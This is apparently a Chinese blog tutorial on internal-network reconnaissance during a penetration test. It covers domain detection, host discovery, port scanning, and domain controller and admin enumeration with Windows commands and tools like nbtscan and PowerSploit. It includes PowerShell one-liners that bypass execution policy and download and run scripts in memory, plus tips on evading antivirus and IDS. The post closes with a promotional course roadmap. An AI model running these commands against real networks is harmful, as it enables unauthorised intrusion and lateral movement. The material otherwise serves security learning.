内网渗透-内网信息收集

1.判断是否有域

ipconfig /all
systeminfo
net config workstation
net time /domain

判断主域,一般域服务器都会同时作为时间服务器

这里分为3中情况:

存在域,并且当前用户是域用户

不存在域,当前网络环境为工作组

存在域,但当前用户不是域用户
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2Ld81HDa-1690719504056)(https://image.3001.net/images/20210730/1627617659_6103797b9b8b66302dc8e.png!small)]

2.域内主机探测

(避免使用暴力扫描工具或图形化工具触发反病毒软件)
(可以在白天和晚上各探测一遍来分析主机的存活数量)
nbtscan.exe

下载链接:nbtscan-1.0.35.exe

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4OgYA4f6-1690719504057)(https://image.3001.net/images/20210730/1627617660_6103797c2c0da77efccc0.png!small)]

扫描结果
sharing :可能有打印共享服务
DC : 可能是域控制器
U=user :可能是登录名为user的用户
IIS :可能安装了IIS服务器
EXCHANEGE :可能安装了微软的exchange
? :未识别出该机器的NETBIOS资源,可使用-f继续扫描

利用icmp协议扫描

ping

for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr “TTL=”

VBS

strSubNet = "192.168.33."
Set objFSO= CreateObject("Scripting.FileSystemObject")
Set objTS = objfso.CreateTextFile("C:\Users\test1\AppData\Local\Temp\res.txt")
For i = 1 To 254
strComputer = strSubNet & i
blnResult = Ping(strComputer)
If blnResult = True Then
objTS.WriteLine "Ping " & strComputer & " success!"
End If
Next

objTS.Close
WScript.Echo "Done!"
Function Ping(strComputer)
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * From Win32_PingStatus Where Address='" & strComputer & "'")
For Each objItem In colItems
Select case objItem.StatusCode
Case 0
Ping = True
Case Else
Ping = False
End select
Exit For
Next
End Function

允许此脚本后会在%temp%路径下生成res.txt文件,里面会显示存活的主机名


利用ARP扫描

arp-scan

github下载链接:[arp-
scan.exe](https://raw.githubusercontent.com/QbsuranAlang/arp-scan-
windows-/master/arp-scan/Release(x64)/arp-scan.exe)(需要特定网络环境)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mbfRv0jz-1690719504061)(https://image.3001.net/images/20210730/1627617662_6103797e5efd595496a50.png!small)]
可见除了广播地址一共扫出来3个主机,而前面使用icmp只扫描出2个,这是因为有些有些系统默认是禁止ICMP的,所以使用多种方法更有效找到所有存活主机。

Nishang 中的 Invoke-ARPScan.ps1 脚本

github下载链接:[Invoke-
ARPScan.ps1](https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/situational_awareness/network/Invoke-
ARPScan.ps1)(需要特定网络环境)

这里也有3中方式:

本地运行

powershell.exe -exec bypass -Command “& {Import-Module C:\Users\test1\Desktop\Invoke-ARPScan.ps1; Invoke-ARPScan -CIDR 192.168.33.0/24}” >> C:\Users\test1\Desktop\log.txt

远程运行

powershell.exe -exec bypass -c "IEX{New-Object Net.WebClient}.DownloadString(‘脚本地址’);invoke-ARPScan-CIDR 192.168.1.1/24">>C:\windows\temp\log.txt:
  1. 无文件运行(没有运行文件,在内存中运行)
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.33.1/PowerSploit-master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts 192.168.33.0/24 -T 4 -ports '445,1433,8080,3389,80' -oA c:\windows\temp\res.txt"

利用TCP/UDP扫描探测

ScanLine

下载链接:ScanLine

sl.exe -h -t 22,80-89,110,389,445,3389,1099,1433,2049,6379,7001,8080,1521,3306,3389,5432 -u 53,161,137,139 -O C:\Users\test1\AppData\Local\Temp\log.txt -p 192.168.33.1-254 /b

3.域内端口扫描

扫描注意是否会触发IDS

Powersploit的invoke-portscan.ps1脚本

github下载链接:[invoke-
portscan.ps1](https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-
Portscan.ps1)

powershell.exe -exec bypass -Command "& {Import-Module "C:\Users\test1\AppData\Local\Temp\Invoke-Portscan.ps1";Invoke-Portscan -Hosts 192.168.33.0/24 -T 4 -ports '445,1433,80,8080,3389' -oA c:\ProgramData\ip_info"}

执行结束后会生成一个ip_info.xml的文件会显示出扫描结果:
命令格式:

powershell.exe -exec bypass -Command "& {Import-Module C:\PowerView.ps1; powerview的命令参数}"

端口 Banner 信息

4.域内控制器的查找

nltest /dclist:yuaneuro.cn
nslookup
-type=SRV _ldap._tcp
net time /domain
net group “domain controllers” /domain

5.域内用户和管理员的获取

查询所有域用户列表

net user /domain
wmic
useraccount get /all

net localgroup administrators /domain
dsquery
user
只能在DC上执行

查询域管理员用户组

net group “domain admins” /domain
net
group “Enterprise admins” /domain

719504072)]

查询域管理员用户组

net group “domain admins” /domain
[外链图片转存中…(img-gnovS0lH-1690719504073)]net
group “Enterprise admins” /domain
[外链图片转存中…(img-2sKXWK5L-1690719504074)]

网络安全学习路线

这是一份网络安全从零基础到进阶的学习路线大纲全览,小伙伴们记得点个收藏!

img[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ZvIrv2hw-1690719504075)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]编辑

阶段一:基础入门

img[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pIlLlTLf-1690719504075)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]

网络安全导论

渗透测试基础

网络基础

操作系统基础

Web安全基础

数据库基础

编程基础

CTF基础

该阶段学完即可年薪15w+

阶段二:技术进阶(到了这一步你才算入门)

img[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qGQKKctz-1690719504076)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]

弱口令与口令爆破

XSS漏洞

CSRF漏洞

SSRF漏洞

XXE漏洞

SQL注入

任意文件操作漏洞

业务逻辑漏洞

该阶段学完年薪25w+

阶段三:高阶提升

img[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jdKPWyls-1690719504077)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]

反序列化漏洞

RCE

综合靶场实操项目

内网渗透

流量分析

日志分析

恶意代码分析

应急响应

实战训练

该阶段学完即可年薪30w+

阶段四:蓝队课程

img[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ycLic8pz-1690719504078)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]

蓝队基础

蓝队进阶

该部分主攻蓝队的防御,即更容易被大家理解的网络安全工程师。

攻防兼备,年薪收入可以达到40w+

阶段五:面试指南&阶段六:升级内容

img

需要上述路线图对应的网络安全配套视频、源码以及更多网络安全相关书籍&面试题等内容

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

同学们可以扫描下方二维码获取哦!

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值